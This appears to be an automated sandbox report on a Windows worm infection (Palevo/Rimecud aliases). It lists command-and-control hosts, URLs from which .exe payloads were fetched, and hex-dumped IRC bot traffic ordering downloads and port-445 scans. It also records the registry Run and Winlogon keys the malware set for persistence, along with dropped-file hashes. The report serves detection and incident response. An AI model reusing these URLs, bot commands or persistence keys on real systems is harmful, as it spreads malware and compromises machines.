204.45.85.210

Remote Host Port Number
112.78.112.208 80
208.53.183.113 80
208.53.183.92 80
218.85.133.201 80
74.63.78.27 80
91.212.127.147 80
204.45.85.210 57221 ircd here
204.45.85.218 57221 ircd here
65.55.92.152 25
76.73.36.42 8800

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://208.53.183.113/nbf.exe
o http://208.53.183.92/usa.exe
o http://208.53.183.92/zalz.exe
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
o http://74.63.78.27/47.exe
o http://91.212.127.147/spm/s_get_host.php?ver=522

MODE #dpi -ix
MODE #! -ix
MODE #Ma -ix
USER SP2-617 * 0 :COMPUTERNAME
MODE [N00_USA_XP_6618489]@ -ix

The following outbound traffic was produced on port 57221:
00000000 | 5052 5256 4D53 4720 2369 203A 4854 5450 | PRRVMSG #i :HTTP
00000010 | 2053 4554 2068 7474 703A 2F2F 3230 382E | SET http://208.
00000020 | 3533 2E31 3833 2E31 3831 2F35 2E65 7865 | 53.183.181/5.exe
00000030 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
00000040 | 5341 5F58 505F 3636 3138 BCB9 4020 3A73 | SA_XP_6618..@ :s
00000050 | 6361 6E2F 2F20 5472 7969 6E67 2074 6F20 | can// Trying to
00000060 | 6765 7420 6578 7465 726E 616C 2049 502E | get external IP.
00000070 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
00000080 | 5341 5F58 505F 3636 3138 BCB9 4020 3A73 | SA_XP_6618..@ :s
00000090 | 6361 6E2F 2F20 5261 6E64 6F6D 2050 6F72 | can// Random Por
000000A0 | 7420 5363 616E 2073 7461 7274 6564 206F | t Scan started o
000000B0 | 6E20 3139 322E 782E 782E 783A 3434 3520 | n 192.x.x.x:445
000000C0 | 7769 7468 2061 2064 656C 6179 206F 6620 | with a delay of
000000D0 | 3520 7365 636F 6E64 7320 666F 7220 3020 | 5 seconds for 0
000000E0 | 6D69 6E75 7465 7320 7573 696E 6720 3235 | minutes using 25
000000F0 | 2074 6872 6561 6473 2E0D 0A50 5252 564D | threads...PRRVM
00000100 | 5347 205B 4E30 305F 5553 415F 5850 5F36 | SG [N00_USA_XP_6
00000110 | 3631 38BC B940 203A 7363 616E 2F2F 2054 | 618..@ :scan// T
00000120 | 7279 696E 6720 746F 2067 6574 2065 7874 | rying to get ext
00000130 | 6572 6E61 6C20 4950 2E0D 0A50 5252 564D | ernal IP...PRRVM
00000140 | 5347 205B 4E30 305F 5553 415F 5850 5F36 | SG [N00_USA_XP_6
00000150 | 3631 38BC B940 203A 7363 616E 2F2F 2052 | 618..@ :scan// R
00000160 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
00000170 | 7374 6172 7465 6420 6F6E 2031 3932 2E31 | started on 192.1
00000180 | 3638 2E78 2E78 3A34 3435 2077 6974 6820 | 68.x.x:445 with
00000190 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
000001A0 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
000001B0 | 6573 2075 7369 6E67 2032 3520 7468 7265 | es using 25 thre
000001C0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001D0 | 3030 5F55 5341 5F58 505F 3636 3138 BCB9 | 00_USA_XP_6618..
000001E0 | 4020 3A73 6361 6E2F 2F20 5365 7175 656E | @ :scan// Sequen
000001F0 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000200 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000210 | 382E 302E 303A 3434 3520 7769 7468 2061 | 8.0.0:445 with a
00000220 | 2064 656C 6179 206F 6620 3520 7365 636F | delay of 5 seco
00000230 | 6E64 7320 666F 7220 3020 6D69 6E75 7465 | nds for 0 minute
00000240 | 7320 7573 696E 6720 3230 2074 6872 6561 | s using 20 threa
00000250 | 6473 2E0D 0A50 5252 564D 5347 205B 4E30 | ds...PRRVMSG [N0
00000260 | 305F 5553 415F 5850 5F36 3631 38BC B940 | 0_USA_XP_6618..@
00000270 | 203A 7363 616E 2F2F 2053 6571 7565 6E74 | :scan// Sequent
00000280 | 6961 6C20 506F 7274 2053 6361 6E20 7374 | ial Port Scan st
00000290 | 6172 7465 6420 6F6E 2031 3932 2E31 3638 | arted on 192.168
000002A0 | 2E31 3436 2E30 3A34 3435 2077 6974 6820 | .146.0:445 with
000002B0 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
000002C0 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
000002D0 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000002E0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000002F0 | 3030 5F55 5341 5F58 505F 3636 3138 BCB9 | 00_USA_XP_6618..
00000300 | 4020 3A73 6361 6E2F 2F20 5365 7175 656E | @ :scan// Sequen
00000310 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000320 | 7461 7274 6564 206F 6E20 3139 322E 302E | tarted on 192.0.
00000330 | 302E 303A 3434 3520 7769 7468 2061 2064 | 0.0:445 with a d
00000340 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000350 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000360 | 7573 696E 6720 3130 2074 6872 6561 6473 | using 10 threads
00000370 | 2E0D 0A50 4153 5320 6C61 6F72 6F73 720D | ...PASS laorosr.
00000380 | 0A4E 4349 4B20 5B4E 3030 5F55 5341 5F58 | .NCIK [N00_USA_X
00000390 | 505F 3636 3138 3438 395D 18E7 400D 0A73 | P_6618489]..@..s
000003A0 | 656E 6420 2321 2C23 4D61 206F 6F6F 6F0D | end #!,#Ma oooo.
000003B0 | 0A | .

Other details

* The following ports were open in the system:

Port Protocol Process
1059 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
1061 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
1066 TCP msvmiode.exe (%System%\msvmiode.exe)
2120 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2121 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2122 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2123 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2124 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2125 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2126 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2127 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2128 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2129 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2130 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2131 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2132 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2133 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2134 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2135 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2136 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2137 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2138 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2139 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2140 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2141 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2142 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2143 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2144 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2145 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2146 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2147 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2148 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2149 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2150 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2151 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2152 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2153 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2154 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2155 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2156 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2157 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2158 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2159 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2160 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2161 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2162 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2163 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2164 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2165 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2166 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2167 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2168 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2169 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2170 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2171 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2172 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2173 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2174 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2175 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2176 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2177 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2178 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2179 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2180 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2181 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2182 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2183 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2184 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2185 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2186 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2187 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2188 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2189 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2190 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2191 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2192 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2193 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2194 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2195 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2196 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2197 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2198 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2199 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2200 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2201 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2202 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2203 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2204 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2205 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2206 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2207 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2208 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2209 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2210 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2211 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2212 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2213 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2214 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2215 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2216 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"
so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"
so that cfdrive32.exe runs every time Windows starts
+ MSODESNV7 = "%System%\msvmiode.exe"
so that msvmiode.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
+ ridt100413 = "1"
+ id = "52257565423258359958893212222606"
+ host = "91.212.127.147"
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
+ Taskman = "%AppData%\ltzqai.exe"
so that ltzqai.exe runs every time Windows starts
o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
+ Tji771 = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\fddg.exe"
so that fddg.exe runs every time Windows starts
o [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
+ Shell = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\fddg.exe,explorer.exe,%AppData%\ltzqai.exe"
so that ltzqai.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name Process Filename Main Module Size
cfdrive32.exe %Windir%\cfdrive32.exe 352 256 bytes
msvmiode.exe %System%\msvmiode.exe 159 744 bytes
492083.exe %Temp%\492083.exe 352 256 bytes
8769.exe %Temp%\8769.exe 212 992 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) / File Size / File Hash / Alias

1. %AppData%\ltzqai.exe
   %Temp%\829.exe
   File Size: 90 112 bytes
   MD5: 0xC631EBC869294C494BF3ACB70FFA1AFB
   SHA-1: 0x63913DDE7F9365F6C8F8F9E5A8C9463956DE7A9E
   Alias: (not available)

2. %Temp%\99.exe
   c:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\fddg.exe
   File Size: 24 576 bytes
   MD5: 0x778445E093BBE2B6A46B1F5CF932C650
   SHA-1: 0x969910F3BB064848C6DC2D2A21871F0D7E040A86
   Alias: W32.Pilleuz [Symantec]
          P2P-Worm.Win32.Palevo.avji [Kaspersky Lab]
          Generic.dx!txn [McAfee]
          Mal/Generic-L [Sophos]
          TrojanDropper:Win32/Injector.I [Microsoft]
          Win-Trojan/Injector.24576.AI [AhnLab]

3. %Temp%\492083.exe
   %Windir%\cfdrive32.exe
   File Size: 86 016 bytes
   MD5: 0x91CF319F0936F134818632CB1B124EEA
   SHA-1: 0x58F72A8883077FCF53EB5EB77D4FF3B82CB54926
   Alias: (not available)

4. %Temp%\8769.exe
   %System%\msvmiode.exe
   File Size: 200 704 bytes
   MD5: 0xB6DA48334F9095D09161FEBD92C2E1C3
   SHA-1: 0x0077D7C29CECB674F80A8B3941CDEC5499EEBD51
   Alias: (not available)

5. c:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\Desktop.ini
   c:\RECYCLER\S-1-5-21-2575938324-5574274277-266027715-8428\Desktop.ini
   File Size: 63 bytes
   MD5: 0xE783BDD20A976EAEAAE1FF4624487420
   SHA-1: 0xC2A44FAB9DF00B3E11582546B16612333C2F9286
   Alias: (not available)

6. c:\RECYCLER\S-1-5-21-2575938324-5574274277-266027715-8428\syscr.exe
   File Size: 105 984 bytes
   MD5: 0x629FC45AE42EDAFC6A1371AA8891BC2A
   SHA-1: 0xF9997A1554D063E0BB7323D23042A76D1F01CDAE
   Alias: P2P-Worm.Win32.Palevo.kbu [Kaspersky Lab]
          Generic.dx!hv.ah [McAfee]
          Mal/EncPk-ME [Sophos]
          Worm:Win32/Rimecud.B [Microsoft]
          Worm.Win32.Rimecud [Ikarus]
          Win32/Autorun.worm.105984 [AhnLab]
